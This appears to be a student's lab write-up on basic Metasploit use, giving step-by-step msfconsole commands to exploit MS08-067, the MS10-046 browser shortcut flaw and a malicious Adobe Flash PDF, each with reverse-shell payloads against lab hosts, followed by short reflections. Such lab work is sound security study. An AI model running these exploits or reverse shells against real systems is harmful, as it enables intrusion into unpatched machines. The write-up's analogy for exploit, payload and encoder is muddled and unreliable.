20155220 Exp5 MSF基础应用
Exp5 MSF基础应用
一个主动攻击实践,MS08-067
- 首先利用 - msfconsole启用msf终端
- 然后利用 - search MS08-067搜索漏洞,会显示相应漏洞模块

- 根据上图,我们输入 - use exploit/windows/smb/ms08_067_netapi,选择相应的模块
- 然后我们可以使用 - show payloads,查看可以使用的模块
  
- 然后根据上图,为获取靶机的shell,所以利用 - set payload generic/shell_reverse_tcp
- 然后输入 - show options,查看配置信息,知道我们需要配置RHOST,LHOST,LPORT,target

- 输入
set RHOST 192.168.241.138
set LHOST 192.168.241.134
set LPORT 5220
进行配置
- 然后我们再次利用 - show options,查看配置信息
  
- 然后 - exploit进行监听
  
针对浏览器的攻击,ms10_046
- 我选择了ms10_046,首先输入search ms10_046查找漏洞

- 由于我们要对浏览器进行攻击,所以我们输入 - use use exploit/windows/browser/ms10_046_shortcut_icon_
- 然后我们输入 - show payloads,查看载荷进行选择,这里我仍用实验一中的载荷set payload generic/shell_reverse_tcp
- 我们利用 - show options查询需要配置的有,LPORT,LHOST,SRVHOST
- 输入 
set SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5220
进行配置
- 再次查看配置信息

- 然后输入 - exploit生成URL,并在windows端访问该URL,kali端如图
  
- 输入 - sessions,可看到一个ID为1的连接,然后输入- session -i 1,接入ID为1的连接,输入- shell,获取成功。
 如图:

针对客户端的攻击
- 首先还是先利用 - search adobe进行搜索
  
- 然后进行选择,我选择的是use windows/fileformat/adobe_flashplayer_button 
- 然后 - set payload windows/meterpreter/reverse_tcp,设置所用荷载,利用show options查看所要配置的信息
  
- 输入如下代码,对LHOST,LPORT,FILENAME进行配置 
set LHOST 192.168.241.134
set LPORT 5220
set FILENAME 20155220.pdf
- 输入exploit,生成20155220.pdf文件
•输入use exploit/multi/handler,进入监听,并设置监听端口,主机号
- 在windows端,打开20155220.pdf,
可惜我本次回连并未成功,经反复实验依旧不能成功,原因不详。
辅助模块应用
- 首先利用show auxiliary,查看辅助模块

- 我选择的是scanner/dns/dns_amp,扫描dns 
- 输入 - show options,查看配置
  
- 输入 - exploit进行监听
  
基础问题
- 用自己的话解释什么是exploit,payload,encode
 encode
 exploit相当于一种运载工具,payload相当于一种包装工具,encode就是编码器,就是对攻击进行伪装。通俗来说,把exploit比作导弹车,payload就是导弹的外壳,encode就是里面真正核心的东西。
实验体会
通过本次实验我对自己的电脑安全产生了很大的怀疑,我有好多补丁因为一些原因都没有安装,说不定哪天碰巧碰到个没安装相应补丁的漏洞,那只怕我的电脑就凉凉了。本次实验还是遇到了一些问题,在针对IE浏览器的攻击时出现了挫折,但好在经过不断尝试,放弃了对IE8.0版本的攻击。特别是本次针对客户端攻击的试验中出现了回连不成功的情况,在反复重装了数个xp后,我还是放弃了这一步,但其中原因还是值得深究。随着课程的学习,我的网络安全意识提高了不少,本次至少学到了补丁的及时安装,尽可能避免病毒、木马的入侵。
20155220 Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165232 Exp5 MSF基础应用
		2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ... 
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
		2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ... 
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
		2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ... 
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
		- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ... 
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
		2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ... 
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
		目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ... 
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
		<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ... 
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
		2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ... 
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
		2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ... 
随机推荐
- 你真的理解PeopleSoft的Web概要(web profile)嘛
			Web概要通过配置门户相关属性来控制门户的所有行为. 在PS系统中可以创建多个web概要,你可以通过不同的web概要来让用户路由到一个特定的web概要来控制超时,外观,缓存设置等.例如,通过Peopl ... 
- 简单三招,设计复杂ERP报表
			报表无疑是ERP系统中用到的最频繁的单据之一.比如每天采购要打印采购明细帐:仓库每天要导出收货或者出货明细:销售每天要打印订单明细等.故报表的设计在ERP系统开发中占据大半江山. 不过笔者在实际工作中 ... 
- Spring Boot系列学习文章(一) -- Intellij IDEA 搭建Spring Boot项目
			前言: 最近做的一个项目是用Spring Boot来做的,所以把工作中遇到的一些知识点.问题点整理一下,做成一系列学习文章,供后续学习Spring Boot的同仁们参考,我也是第一次接触Spring ... 
- 2018-10-27  22:44:33 c language
			2018-10-27 22:44:33 c language 标准的C语言并不支持上面的二进制写法,只是有些编译器自己进行了扩展,才支持二进制数字.并不是所有的编译器都支持二进制数字,只有一部分编译 ... 
- ngnix https
			server { listen 80;#端口号 server_name www.xxxx.net;#本机 charset ... 
- nginx www解析失败问题解决
			nginx www解析失败: nginx代理IIS下域名时 xxxx.xxx可以解析 但www.xxxx.xxx解析失败 IIS增加ip解析:配置下127.0.0.1就可以解析了. 
- Android Vsync 原理浅析
			Preface Android中,Client测量和计算布局,SurfaceFlienger(server)用来渲染绘制界面,client和server的是通过匿名共享内存(SharedClient) ... 
- 《图解HTTP》
			第一章.了解web及网络基础 1.2 http的诞生 HTTP于1990年问世,那时候HTTP并没有作为正式的标准被建立,被称为HTTP/0.9 HTTP正式作为标准被公布是在1996年5月,版本被命 ... 
- 树莓派Pi2 使用入门
			1. 材料和环境 树莓派Pi2, microSD卡(大于等于4G), 网线 官网下载: 系统镜像 Raspbian Jessie (https://downloads.raspberrypi.org/ ... 
- pycrypto加解密
			下载pycrypto:http://www.voidspace.org.uk/python/modules.shtml#pycrypto (Windows版本) from Crypto.Cipher ... 
